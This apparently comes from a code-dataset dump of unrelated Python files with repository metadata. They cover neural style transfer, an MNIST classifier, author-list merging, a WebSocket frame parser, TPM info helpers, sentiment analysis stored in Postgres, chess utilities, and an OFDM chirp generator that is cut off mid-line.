CLIP_FPS)\n\n\n\n\nif __name__ == '__main__':\n\n import argparse\n\n main_arg_parser = argparse.ArgumentParser(description=\"parser for training mutli-style-transfer\")\n \n main_arg_parser.add_argument(\"--styles-dir\", type=str, required=True,\n help=\"path to folder containing style images\")\n \n main_arg_parser.add_argument(\"--model-dir\", type=str, default=None,\n help=\"directory to save the model in\")\n\n main_arg_parser.add_argument(\"--imsize\", type=int, default=512,\n help=\"\")\n\n main_arg_parser.add_argument(\"--content1\", type=int, default=0,\n help=\"\")\n main_arg_parser.add_argument(\"--content2\", type=int, default=1,\n help=\"\")\n\n main_arg_parser.add_argument(\"--path_video\", type=str, default='result/test.mp4',\n help=\"\")\n main_arg_parser.add_argument(\"--path_image\", type=str, default='dataset/images/trump.jpg',\n help=\"\")\n main_arg_parser.add_argument(\"--total_frames\", type=int, default=1,\n help=\"\")\n\n args = main_arg_parser.parse_args()\n\n main(args)\n \n\n\n ","repo_name":"kevin-tofu/Real-time-multi-style-transfer","sub_path":"transition.py","file_name":"transition.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33328603452","text":"import logging\nimport os\n\nimport numpy\nimport tensorflow as tf\nfrom PIL.Image import Image\nfrom tensorflow import keras\n\n# Model / data parameters\nnum_classes = 10\ninput_shape = (28, 28, 1)\n\n\n# Define a simple sequential model\ndef create_model():\n model = tf.keras.Sequential([\n keras.Input(shape=input_shape),\n tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation=\"relu\"),\n tf.keras.layers.MaxPooling2D(pool_size=(2, 2)),\n tf.keras.layers.Conv2D(64, kernel_size=(3, 3), activation=\"relu\"),\n tf.keras.layers.MaxPooling2D(pool_size=(2, 2)),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Dense(10,\n activation=tf.nn.softmax,\n kernel_constraint=tf.keras.constraints.MinMaxNorm(\n min_value=0.0, max_value=1.0, rate=1.0, axis=0\n )\n ),\n ])\n\n model.compile(\n loss=\"categorical_crossentropy\",\n optimizer=\"adam\",\n metrics=[\"accuracy\"]\n )\n model.summary()\n\n return model\n\n\ndef predict(model, image: Image):\n # Change to grayscale\n image = image.convert('L')\n # Change to size supported by the MNIST\n image = image.resize((input_shape[0], input_shape[1]))\n image_array = numpy.array(image).reshape(input_shape)\n image_array = tf.expand_dims(image_array, 0)\n\n predictions = model.predict(image_array)\n logging.debug(predictions)\n return predictions\n","repo_name":"wangyingwwyy/Privacy-Preserving-Federated-Learning-I","sub_path":"PySEAL_Agg_Demo-master/PySEAL_Agg_Demo-master/server/model/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"35110583185","text":"# Imports\r\nimport os\r\nfrom difflib import SequenceMatcher\r\n\r\nimport pandas as pd\r\nfrom whoswho import who\r\n\r\n# File directories and file names\r\ndir1 = os.path.join('C:',os.sep,'Users', 'pietr', 'Desktop', 'Esther and Pietro', 'Chinese Firewall project', '')\r\nprint(dir1)\r\nfile_master = 'all_authors_list_top50.csv'\r\n\r\ndir2 = os.path.join('C:',os.sep,'Users', 'pietr', 'Desktop', 'Esther and Pietro', 'Chinese Firewall project', 'Output', '')\r\nfile_new = 'authorsonly.csv'\r\nprint(dir2)\r\ndir_output = os.path.join('C:',os.sep,'Users', 'pietr', 'Desktop', 'Esther and Pietro', 'Chinese Firewall project', 'Output',\r\n '')\r\nprint(dir_output)\r\nfile_output = 'Output.csv'\r\n\r\n# Load data sets\r\ndf_master = pd.read_csv(dir1 + file_master)\r\ndf_master['author_name'] = df_master['author']\r\ndf_master['Source'] = 'Master Dataset'\r\ndel df_master['author']\r\n\r\ndf_new = pd.read_csv(dir2 + file_new)\r\ndf_new['coauthor_name'] = df_new['coauthor']\r\ndf_new['Source'] = 'New Dataset'\r\ndel df_new[\"coauthor\"]\r\n\r\n# Merge the two data sets\r\nfile_int = 'author_coauthor.csv'\r\ndf_merged = df_master.join(df_new['coauthor_name'])\r\ndf_merged.to_csv(dir1 + file_int, index=False)\r\n\r\n\r\n# First remove all duplicates that are identical matches\r\n# df_merged.drop_duplicates(subset='Name', keep=\"first\", inplace=True)\r\ndf_merged.reset_index(drop=True, inplace=True)\r\n\r\n#Create a subsample of 300 observations of df_merged\r\ndf_merged_sample = df_merged.sample(n=300,replace=False)\r\ndf_merged_sample.to_csv(dir_output + file_output, index=False)\r\nprint(df_merged_sample.head(10))\r\n\r\n\r\n\r\n\r\n","repo_name":"PAletti00/Fuzzy-Merge_Chinese-Firewall","sub_path":"Sample.py","file_name":"Sample.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30195622462","text":"'''\r\nFaça um programa que leia o nome e peso de várias pessoas,\r\nguardando tudo em uma lista. No final, mostre:\r\nA) quantas pessoas foram cadastradas\r\nB) uma listagem com as pessoas mais pesadas\r\nC) uma listagem com as pessoas mais leves\r\n'''\r\nprint('=' * 50)\r\nprint((' ' * 10), 'Programa \\033[1;4mDESAFIO84\\033[m iniciado.')\r\nprint('=' * 50)\r\n\r\nlista_tudo = list()\r\nlista_pesadas = list()\r\nlista_leves = list()\r\ncont = 0\r\nresposta = 'S'\r\nwhile resposta == 'S':\r\n lista_tudo.append(str(input('Nome: ')))\r\n lista_tudo.append(float(input('Peso: ')))\r\n if cont == 0:\r\n lista_pesadas.append(lista_tudo[0])\r\n lista_pesadas.append(lista_tudo[1])\r\n lista_leves.append(lista_tudo[0])\r\n lista_leves.append(lista_tudo[1])\r\n lista_tudo.clear()\r\n else:\r\n if lista_tudo[1] == lista_pesadas[1]:\r\n lista_pesadas.append(lista_tudo[0])\r\n lista_pesadas.append(lista_tudo[1])\r\n lista_tudo.clear()\r\n elif lista_tudo[1] > lista_pesadas[1]:\r\n lista_pesadas.clear()\r\n lista_pesadas.append(lista_tudo[0])\r\n lista_pesadas.append(lista_tudo[1])\r\n lista_tudo.clear()\r\n elif lista_tudo[1] == lista_leves[1]:\r\n lista_leves.append(lista_tudo[0])\r\n lista_leves.append(lista_tudo[1])\r\n lista_tudo.clear()\r\n elif lista_tudo[1] < lista_leves[1]:\r\n lista_leves.clear()\r\n lista_leves.append(lista_tudo[0])\r\n lista_leves.append(lista_tudo[1])\r\n lista_tudo.clear()\r\n cont += 1\r\n resposta = str(input('Deseja continuar [S/N]:\\n')).upper()\r\n\r\nprint('_' * 50)\r\nprint(f'Quantidade de pessoas cadastradas: \\033[33m{cont}\\033[m')\r\nprint(f'Lista das pessoas mais pesadas: \\033[31m{lista_pesadas}\\033[m')\r\nprint(f'Lista das pessoas mais leves: \\033[32m{lista_leves}\\033[m')\r\n\r\nprint('=' * 50)\r\nprint('Fim do programa.')","repo_name":"alex-gsantos/cursos_em_video","sub_path":"desafio84.py","file_name":"desafio84.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41299667941","text":"from bitstring import BitArray\nfrom typing import ByteString\nfrom .base import Header\n\n\"\"\"\nFrame format: \n​​\n 0 1 2 3\n 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\n +-+-+-+-+-------+-+-------------+-------------------------------+\n |F|R|R|R| opcode|M| Payload len | Extended payload length |\n |I|S|S|S| (4) |A| (7) | (16/64) |\n |N|V|V|V| |S| | (if payload len==126/127) |\n | |1|2|3| |K| | |\n +-+-+-+-+-------+-+-------------+ - - - - - - - - - - - - - - - +\n | Extended payload length continued, if payload len == 127 |\n + - - - - - - - - - - - - - - - +-------------------------------+\n | |Masking-key, if MASK set to 1 |\n +-------------------------------+-------------------------------+\n | Masking-key (continued) | Payload Data |\n +-------------------------------- - - - - - - - - - - - - - - - +\n : Payload Data continued ... :\n + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +\n | Payload Data continued ... |\n +---------------------------------------------------------------+\n\"\"\"\n\nclass OpCode:\n\n TEXT = 0x1\n BINARY = 0x2\n CLOSE = 0x8\n PING = 0x9\n PONG = 0xa\n\nclass WebSocket(Header):\n\n def __init__(self, header: ByteString = None) -> None:\n super().__init__(header)\n self.HEADERS = {\n \"FIN\": 1,\n \"RSV1\": 1,\n \"RSV2\": 1,\n \"RSV3\": 1,\n \"OpCode\": 4,\n \"Mask\": 1,\n \"PL_len\": 7,\n \"Extended payload length\": None,\n \"Mask-Key\": 32,\n \"Payload data\": None \n }\n\n def create(self, msg: str, opcode: OpCode = OpCode.TEXT, fin: bool = True):\n length = len(msg)\n msg = msg.encode('utf-8')\n payload_len = 0\n extend_len = 0\n\n if length > 0xffffffffffffffff:\n raise BufferError(\"Msg too long\")\n elif length > 0xffff:\n payload_len = 127\n extend_len = length\n elif length > (0xff >> 1) - 2:\n payload_len = 126\n extend_len = length\n else:\n payload_len = length\n \n payload = bytes([(fin << 7) + opcode])\n payload += payload_len.to_bytes(1, byteorder='big')\n if extend_len == 0:\n payload += msg\n elif payload_len == 126:\n payload += extend_len.to_bytes(2, byteorder='big') + msg\n elif payload_len == 127:\n payload += extend_len.to_bytes(8, byteorder='big') + msg\n else:\n raise SystemError(\"payload_len is not correctlly set\")\n\n self.HEADER = payload\n\n def _parser(self) -> None:\n\n TEMP_HEADER = {}\n header_index = 0\n \n for header in self.HEADERS:\n\n header_len = self.HEADERS[header]\n\n if header == \"Extended payload length\":\n\n if TEMP_HEADER[\"PL_len\"] == 126:\n header_len = 16\n elif TEMP_HEADER[\"PL_len\"] == 127:\n header_len = 64\n else:\n header_len = 0\n\n if header == \"Mask-Key\":\n\n header_len = self.HEADERS[header] if TEMP_HEADER[\"Mask\"] == 1 else 0\n\n if header == \"Payload data\":\n\n header_len = TEMP_HEADER[\"PL_len\"] if TEMP_HEADER[\"Extended payload length\"] == None else TEMP_HEADER[\"Extended payload length\"]\n\n target = self.HEADER[header_index // 8 : header_index // 8 + header_len]\n if TEMP_HEADER[\"Mask\"] == 1:\n TEMP_HEADER[\"Mask-Key\"] = list(map(lambda i: TEMP_HEADER[\"Mask-Key\"] >> ((3 - i)*8) & 0xff, range(4)))\n target = list(target)\n for i in range(len(target)):\n target[i] = chr(target[i] ^ TEMP_HEADER[\"Mask-Key\"][i % 4])\n target = ''.join(target).encode('utf-8')\n\n target = target.decode('utf-8')\n\n else:\n target = self.get_data(self.HEADER, header_index, header_len)\n header_index += header_len\n \n TEMP_HEADER.update({header: target})\n\n self.HEADER = TEMP_HEADER\n return TEMP_HEADER\n\n def get_data(self, header, index, len):\n\n res = BitArray(bytes=header, length=len, offset=index)\n\n if not len == 0:\n return int(res.bin, 2)\n else:\n return None\n\n def raw(self) -> ByteString:\n return self.HEADER\n","repo_name":"N0Ball/NCU_Socket","sub_path":"app/modules/header/websocket_headers.py","file_name":"websocket_headers.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17787991939","text":"from collections import defaultdict\n\n\nclass Traversable:\n \"\"\"Attributes are traversable recursively.\"\"\"\n\n def __init__(self, data):\n self.data = data\n\n def __str__(self):\n return str(self.data)\n\n def attrs_recursive(self, parent=\"\"):\n \"\"\"Return a generator to all attributes.\"\"\"\n attrs_rec = []\n sep = \".\" if parent else \"\"\n\n for attr in dir(self):\n attr = attr.replace(\"-\", \"_\")\n child = getattr(self, attr)\n if isinstance(child, Traversable):\n attrs_rec.extend(child.attrs_recursive(parent=f\"{parent}{sep}{attr}\"))\n else:\n attrs_rec.append(f\"{parent}{sep}{attr}\")\n\n yield from attrs_rec\n\n\nclass BasicDict(Traversable):\n \"\"\"Takes a dict and makes values accessible via dot notation.\"\"\"\n\n def __getattr__(self, attr):\n return self.data[attr]\n\n def __dir__(self):\n return self.data.keys()\n\n\nclass NamedKVPList(Traversable):\n \"\"\"\n Takes a list of KVPs where both key and value are named (i.e. KVPs itself),\n e.g.\n [\n {\n \"property\": \"VENDOR_TPM_TYPE\",\n \"value\": 1\n },\n {\n \"property\": \"FIRMWARE_VERSION_1\",\n \"value\": 538513443\n }\n ]\n Makes the values accessible via dot notation. If a value_class is given, an\n instance of that class is returned (passing the value to __init__()).\n \"\"\"\n\n def __init__(self, data, key_name, value_name, value_class=None):\n super().__init__(data)\n self.key_name = key_name\n self.value_name = value_name\n self.value_class = value_class\n\n def __getattr__(self, attr):\n value = next(\n item[self.value_name]\n for item in self.data\n if item[self.key_name].lower() == attr.lower()\n )\n\n if self.value_class:\n return self.value_class(value)\n\n return value\n\n def __dir__(self):\n return [item[self.key_name].lower() for item in self.data]\n\n\nclass Capabilities(Traversable):\n \"\"\"Takes a list of capability dicts and makes them accessible via dot notation.\"\"\"\n\n def _get_cap_data(self, description):\n return next(cap for cap in self.data if cap[\"description\"] == description)[\n \"info\"\n ][\"data\"]\n\n def __getattr__(self, attr):\n # some caps are accessed via '_' but their names contain '-'\n attr = attr.replace(\"_\", \"-\")\n cap_data = self._get_cap_data(attr)\n\n cap = defaultdict(\n lambda: cap_data,\n {\n \"algorithms\": NamedKVPList(\n cap_data, \"alg\", \"algProperties\", value_class=globals()[\"BasicDict\"]\n ),\n \"properties-fixed\": NamedKVPList(cap_data, \"property\", \"value\"),\n \"properties-variable\": NamedKVPList(cap_data, \"property\", \"value\"),\n \"commands\": None, # TODO by command index?\n \"pcrs\": NamedKVPList(cap_data, \"hash\", \"pcrSelect\"),\n \"pcr-properties\": NamedKVPList(cap_data, \"tag\", \"pcrSelect\"),\n },\n )[attr]\n\n return cap\n\n def __dir__(self):\n return [item[\"description\"] for item in self.data]\n\n\ndef str_from_int_list(int_list):\n \"\"\"Cast integers to bytes and decode as string.\"\"\"\n string = b\"\".join(\n integer.to_bytes(4, byteorder=\"big\") for integer in int_list\n ).decode(\"utf-8\")\n # remove leading or trailing whitespaces\n string = string.strip()\n # remove null bytes\n string = string.replace(\"\\x00\", \"\")\n # replace multiple whitespaces with a single one\n string = \" \".join(string.split())\n\n return string\n\n\nclass FapiInfo(Traversable):\n \"\"\"Takes a FAPI info dict and and makes its values accessible via dot notation.\"\"\"\n\n def __getattr__(self, attr):\n item_data = self.data[attr]\n\n return defaultdict(\n lambda: item_data,\n {\n \"fapi_config\": BasicDict(item_data),\n \"capabilities\": Capabilities(item_data),\n },\n )[attr]\n\n @property\n def vendor_string(self):\n \"\"\"Get the TPM Vendor String.\"\"\"\n return str_from_int_list(\n [\n self.capabilities.properties_fixed.vendor_string_1,\n self.capabilities.properties_fixed.vendor_string_2,\n self.capabilities.properties_fixed.vendor_string_3,\n self.capabilities.properties_fixed.vendor_string_4,\n ]\n )\n\n @property\n def manufacturer(self):\n \"\"\"Get the TPM Manufacturer.\"\"\"\n return str_from_int_list([self.capabilities.properties_fixed.manufacturer])\n\n @property\n def firmware_version(self):\n \"\"\"Get the TPM Firmware Version (formatted according to vendor conventions).\"\"\"\n key = f\"{self.manufacturer}.{self.vendor_string}\"\n ver1 = self.capabilities.properties_fixed.firmware_version_1\n ver2 = self.capabilities.properties_fixed.firmware_version_2\n\n return defaultdict(\n lambda: f\"{ver1:x}.{ver2:x}\", {\"IBM.SW TPM\": f\"{ver1:x}.{ver2:x}\"}\n )[key]\n\n @property\n def spec_revision(self):\n \"\"\"Get the TPM Specification Revision.\"\"\"\n rev = self.capabilities.properties_fixed.ps_revision\n # Add '.' after first digit\n rev = f\"{rev // 100}.{rev % 100}\"\n\n return rev\n\n def __dir__(self):\n return self.data.keys()\n","repo_name":"tpm2-software/tpm2-pytss","sub_path":"src/tpm2_pytss/fapi_info.py","file_name":"fapi_info.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"48"} +{"seq_id":"39959803211","text":"import psycopg2 as postgres\nimport csv as csv\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nsentimentAnalyzer = SentimentIntensityAnalyzer()\n# create connection to the database\ndatabaseConnection = postgres.connect(host=\"localhost\", dbname=\"DataAnalytics\", user=\"postgres\", password=\"1\")\n# create a cursor to execute commands\ndatabaseCursor = databaseConnection.cursor()\n\nnameFile = open(\"./allCleanedFiles.txt\", \"r\", encoding=\"utf8\")\nlines = nameFile.read().splitlines()\n\ndef sentiment_analyzer_scores(sentence):\n score = sentimentAnalyzer.polarity_scores(sentence)\n #print(\"{:-<40} {}\".format(sentence, str(score)))\n #print(type(score))\n return score\n\n# build a correctly formatted string\ndef build_tuple_string(arrayOfStrings):\n insertString = \"'\" + str(arrayOfStrings[0]) +\"'\"\n for i in range(1, len(arrayOfStrings)):\n string = str(arrayOfStrings[i])\n #this is done to prevent an sql error because one value is no available for some reason\n if string == '':\n string = str(-1)\n insertString += \", '\" + string + \"' \"\n return insertString\n\n\ndef insert_tuple_into_database(tuple):\n databaseCursor.execute(\n \"\"\"INSERT INTO Posts (Id, ParentId, CreationDate, Score, Body, OwnerUserId, LastEditorUserID, LastEditDate, CommentCount, positiveavg, negativeavg, neutralavg, compundavg, positiveall, negativeall, neutralall, compoundall, community) VALUES ({})\"\"\".format(tuple))\n\n#if no editor is in the tuple, we simply omit the insert of the editor and date\ndef insert_tuple_into_database_without_editor(tuple):\n databaseCursor.execute(\n \"\"\"INSERT INTO Posts (Id, ParentId, CreationDate, Score, Body, OwnerUserId, CommentCount, positiveavg, negativeavg, neutralavg, compundavg, positiveall, negativeall, neutralall, compoundall, community) VALUES ({})\"\"\".format(tuple))\n\n\n\n\n\nfor lineFile in lines:\n print(\"Opening file: \" + lineFile)\n file = open(\"./CleanedFiles/\"+lineFile, encoding=\"utf8\", mode=\"r\")\n reader = csv.reader(file, delimiter=',')\n communityValue = -1\n if lineFile[0] == \"C\":\n #c answer\n communityValue = 0\n else:\n # python answers\n communityValue = 1\n\n insertionCounter = 0\n ignoredCounter = 0\n\n\n # analyze the score\n\n # after a certain amount of rows the data should be committed into the database so that it doesn't have to commit all\n # tuples at the end\n rowCounter = 0\n for row in reader:\n if rowCounter == 0:\n rowCounter += 1\n continue\n rowCounter += 1\n body = row[8]\n # needed because the sql command cannot handle strings with ' as it is the sql string symbol\n body = body.replace(\"'\", \" \")\n #some answers were just code, so these were completely wiped out and now do not have anything to analyze\n if len(body) == 0:\n ignoredCounter += 1\n continue\n # get the single liens of the string\n linesOfBody = body.splitlines()\n\n # I average the value of the sum of values of all lines and also further down analyze the whole body at once to have a comparison for the analysis\n sumOfScores = [0, 0, 0, 0]\n emptyLinesCounter = 0\n #print(rowCounter-1)\n for line in linesOfBody:\n if line != \"\":\n score = sentiment_analyzer_scores(line)\n sumOfScores[0] += score[\"neg\"]\n sumOfScores[1] += score[\"neu\"]\n sumOfScores[2] += score[\"pos\"]\n sumOfScores[3] += score[\"compound\"]\n else:\n emptyLinesCounter += 1\n wholeScore = sentiment_analyzer_scores(body)\n\n # some posts still have newline characters, so they are not caught by the previous empty check\n if len(linesOfBody) - emptyLinesCounter == 0:\n ignoredCounter += 1\n continue\n #average all the values\n sumOfScores[0] = sumOfScores[0]/(len(linesOfBody)-emptyLinesCounter)\n sumOfScores[1] = sumOfScores[1] / (len(linesOfBody) - emptyLinesCounter)\n sumOfScores[2] = sumOfScores[2] / (len(linesOfBody) - emptyLinesCounter)\n sumOfScores[3] = sumOfScores[3] / (len(linesOfBody) - emptyLinesCounter)\n\n lasteditdate = row[13]\n lasteditorid = row[11]\n tupleString = \"\"\n if lasteditdate == '' or lasteditorid == '':\n tupleString = build_tuple_string(\n [row[0], row[3], row[4], row[6], body, row[9], row[18], sumOfScores[2],\n sumOfScores[0], sumOfScores[1], sumOfScores[3], wholeScore[\"pos\"], wholeScore[\"neg\"], wholeScore[\"neu\"],\n wholeScore[\"compound\"], communityValue])\n insert_tuple_into_database_without_editor(tupleString)\n insertionCounter += 1\n else:\n tupleString = build_tuple_string([row[0], row[3], row[4], row[6], body, row[9], lasteditorid, lasteditdate, row[18], sumOfScores[2], sumOfScores[0], sumOfScores[1], sumOfScores[3], wholeScore[\"pos\"], wholeScore[\"neg\"], wholeScore[\"neu\"], wholeScore[\"compound\"], communityValue])\n\n insert_tuple_into_database(tupleString)\n\n insertionCounter += 1\n # exit(0)\n\n # commit all tuples into the databse\n databaseConnection.commit()\n print(\"Inserted \" + str(insertionCounter) + \" into \" + lineFile + \" tuples and omitted \" + str(ignoredCounter) + \" tuples because of no text in the answer body after code cleaning.\")\n print(\"There were \" + str(rowCounter) + \" tuples in total and \" + str(rowCounter-ignoredCounter-1) + \" should have been inserted from that. Do the values match?\")\n # example tupel\n # testTupel = \"'555555', '5555', '2020-03-01 04:05:06', '2000', 'hallöle', '-5', '-100', '2020-2-12 07:08:09', '100', '0.2565', '0.356', '0.4565', '0.5565', '0.2565', '0.356', '0.4565', '0.5565'\"\n\n # insert the current tupel\n\n# close the cursor\ndatabaseCursor.close()\ndatabaseConnection.close()\n","repo_name":"GilgusMaximus/PolarityMining-StackOverflow","sub_path":"DataProcessing/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3866999907","text":"from typing import List as tList;\nfrom typing import Tuple as tTuple;\nfrom pygame.sprite import Sprite;\nimport pygame;\nfrom pygame import Vector2;\nfrom machine import State;\n\nclass StateSprite(Sprite):\n\n def __init__(self,\n state: State,\n state_color: tTuple[int, int, int],\n curr_state_color: tTuple[int, int, int],\n text_color: tTuple[int, int, int],\n bg_color: tTuple[int, int, int],\n width: int,\n font: pygame.font.Font):\n\n super().__init__();\n\n self.width = width;\n\n self.state = state;\n self.is_curr = False;\n\n self.font = font;\n\n pos = self.state.pos - Vector2(width // 2);\n\n # Save colors\n\n self.state_color = state_color;\n self.curr_state_color = curr_state_color;\n self.text_color = text_color;\n self.bg_color = bg_color;\n\n # Set up image surface\n\n self.image = pygame.Surface(size = (width, width)); # Creates the initial surface to draw the sprite on\n\n # Set up rect\n\n self.rect = self.image.get_rect();\n self.rect.x = pos[0];\n self.rect.y = pos[1];\n\n # Draw onto surface\n \n self.redraw();\n\n def update(self,\n curr_state: int) -> None:\n\n super().update();\n\n self.is_curr = curr_state == self.state.n;\n\n self.redraw();\n\n def redraw(self) -> None:\n\n self.image.fill(color = self.bg_color); # Fills the surface with the background color\n self.image.set_colorkey(self.bg_color); # Sets what color pixels count as transparent pixels\n\n # Draw circle to surface\n\n color = (self.state_color) if (not self.is_curr) else (self.curr_state_color);\n\n pygame.draw.circle(\n surface = self.image,\n color = color,\n center = Vector2(self.width // 2),\n radius = self.width // 2\n );\n\n # Write n on circle\n \n text = self.font.render(\n str(self.state.n),\n True,\n self.text_color,\n None\n );\n \n text_width = text.get_rect().width;\n text_height = text.get_rect().height;\n\n text_pos = Vector2(self.width // 2);\n text_pos[0] -= text_width // 2;\n text_pos[1] -= text_height // 2;\n\n self.image.blit(\n source = text,\n dest = text_pos\n );\n\n def set_is_curr(self,\n b: bool) -> None:\n self.is_curr = b;\n\n def check_pos_in_sprite(self,\n pos: Vector2\n ) -> bool:\n\n \"\"\"Checks whether the provided position is in the bounds of this state. Bounds are taken to be in the shape of a circle around the center\"\"\"\n \n disp = pos - self.state.pos;\n sqr_d = disp.magnitude_squared();\n\n return sqr_d <= (self.width/2)**2;\n","repo_name":"ofsouzap/TuringMachineEditor","sub_path":"state_sprite.py","file_name":"state_sprite.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42089016161","text":"\nfrom create_gamma_ij import *\n\ndef get_current_cost(db):\n\tW = db['W_matrix']\n\tiv = np.array(range(db['N']))\n\tjv = iv\n\n\n\tI = np.eye(W.shape[1])\n\n\t#\tSetting up the cost function\n\tcost_foo = 0\n\tfor i in iv:\n\t\tfor j in jv:\n\t\t\t\n\t\t\tx_dif = db['data'][i] - db['data'][j]\n\t\t\tx_dif = x_dif[np.newaxis]\n\t\t\n\t\t\tgamma_ij = create_gamma_ij(db, db['y_tilde'], i, j)\n\t\t\tcost_foo = cost_foo - gamma_ij*np.exp(-x_dif.dot(W).dot(W.T).dot(x_dif.T))\n\n\treturn cost_foo\n\n","repo_name":"taohong08/ISM","sub_path":"lib/get_current_cost.py","file_name":"get_current_cost.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17393207604","text":"import fnmatch\nimport os\n\nimport chess\nimport pandas as pd\nimport torch\n\n\ndef get_device():\n \"\"\"\n Checks which device is most appropriate to perform the training.\n If cuda is available, cuda is returned, otherwise mps or cpu.\n\n Returns\n -------\n str\n the device which is used to perform the training.\n\n \"\"\"\n _device = (\n \"cuda\"\n if torch.cuda.is_available()\n else \"mps\"\n if torch.backends.mps.is_available()\n else \"cpu\"\n )\n\n print(f\"We are going to use {_device} device ...\")\n return _device\n\n\ndef get_files_from_pattern(directory, file_pattern):\n \"\"\"\n\n Parameters\n ----------\n directory : str\n a directory\n file_pattern : str\n a file name pattern\n\n Returns\n -------\n list\n Returns all files (including directory) matching the pattern in the given directory\n\n \"\"\"\n matching_files = [file for file in os.listdir(directory) if fnmatch.fnmatch(file, file_pattern)]\n return [os.path.join(directory, file) for file in matching_files]\n\n\ndef dataframe_from_files(file_names_with_directory, pickle_files=False):\n \"\"\"\n\n Parameters\n ----------\n directory : str\n a directory\n file_names_with_directory : list\n a list of file names\n\n\n Returns\n -------\n pd.Dataframe\n a single Dataframe of all the given files in the given directory without the index\n\n \"\"\"\n _dataframes = []\n for file_name_with_directory in file_names_with_directory:\n print(f\"Read {file_name_with_directory} ...\")\n if pickle_files:\n _dataframes.append(pd.read_pickle(file_name_with_directory))\n else:\n _dataframes.append(pd.read_csv(file_name_with_directory))\n\n return pd.concat(_dataframes, ignore_index=True)\n\n\ndef write_values_in_bars(curr_plot):\n \"\"\"\n Writes the values from bar plots into the bars.\n \"\"\"\n for p in curr_plot.patches:\n curr_plot.annotate(format(p.get_height(), '.1f'),\n (p.get_x() + p.get_width() / 2., p.get_height()),\n ha='center', va='center',\n xytext=(0, 9),\n textcoords='offset points')\n\n\n# Check checkmate\ndef is_checkmate(fen) -> bool:\n \"\"\"\n Checks if FEN is representing a checkmate position.\n\n Parameters\n ----------\n fen String input as FEN\n\n Returns\n -------\n True if checkmate\n \"\"\"\n board = chess.Board()\n board.set_fen(fen)\n return board.is_checkmate()\n\n\n# The stalemate is a position where one player has no legal moves available and they are not in check.\ndef is_stalemate(fen) -> bool:\n \"\"\"\n Checks if FEN is representing as stalemate.\n\n Parameters\n ----------\n fen String input as FEN\n\n Returns\n -------\n true if stalemate\n \"\"\"\n board = chess.Board()\n board.set_fen(fen)\n return board.is_stalemate()\n\n\ndef get_valid_positions(current_position):\n legal_moves_fen = []\n try:\n board = chess.Board(current_position)\n legal_moves = list(board.legal_moves)\n for move in legal_moves:\n # reset\n new_board = chess.Board(current_position)\n new_board.push_uci(move.uci())\n legal_moves_fen.append(new_board.fen())\n finally:\n return legal_moves_fen\n","repo_name":"danielh1307/chessmait","sub_path":"src/lib/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72054136787","text":"from time import time\nfrom tracemalloc import start\nimport numpy as np\nimport scipy.signal\nfrom math import ceil\ntry:\n from utils import ofdm,encode #handles both file in utils folder and outside utils folder\nexcept:\n import ofdm,encode\n\ndef generate_chirp(duration, fs, low=20, high=20000, silence_duration=0, double=False):\n \"\"\"Return a chirp signal using the given parameters\n\n :param duration: duration of a single chirp (in secs)\n :param fs: sampling frequency\n :param low: lower bound of chirp freq, defaults to 20\n :param high: upper bound of chirp freq, defaults to 20000\n :param silence_duration: duration of silence before the chirp signal (in secs), defaults to 0\n :param double: generate double chirp if True, defaults to False\n :return: ndarray of the chirp signal with delay\n \"\"\"\n sample_times = np.linspace(0, duration, fs * duration)\n chirp = scipy.signal.chirp(sample_times, low, duration, high)\n silence = np.zeros(ceil(fs * silence_duration))\n\n if double:\n delayed_chirp = np.append(silence, np.tile(chirp, 2))\n else:\n delayed_chirp = np.append(silence, chirp)\n \n return delayed_chirp\n\ndef generate_known_ofdm(fs,dft_length,cp_length,low_freq,high_freq,encode_method,repeat_time, seed):\n if encode_method == 'bpsk':\n bits_per_symbol = 1\n elif encode_method == 'qpsk':\n bits_per_symbol = 2\n \n\n spb = ofdm.subcarriers_per_block(fs,dft_length,low_freq,high_freq)\n np.random.seed(seed)\n known_string = np.random.randint(2,size=2*spb)\n known_string_stack = np.tile(known_string,repeat_time-1) #generate one ofdm symbol with prefix (cp length normal), the rest without (cp length set to 0)\n\n #convert string to complex symbols\n if encode_method == 'qpsk':\n symbols_first = encode.qpsk_encode(known_string)\n symbols_rest = encode.qpsk_encode(known_string_stack)\n elif encode_method == 'bpsk':\n symbols_first = encode.bpsk_encode(known_string)\n symbols_rest = encode.bpsk_encode(known_string_stack)\n\n #print(symbols_rest[::spb]) #first complex info qpsk\n\n #convert string of info to ofdm data\n known_shifted_first = ofdm.subcarrier_shift_gaussian(symbols_first, dft_length, fs, low_freq, high_freq, 0.01, bits_per_symbol, constellation=encode_method)\n known_ofdm_data_first = ofdm.symbols_to_ofdm(known_shifted_first, dft_length, cp_length)\n \n #known_shifted_rest = ofdm.subcarrier_shift_gaussian(symbols_rest, dft_length, fs, 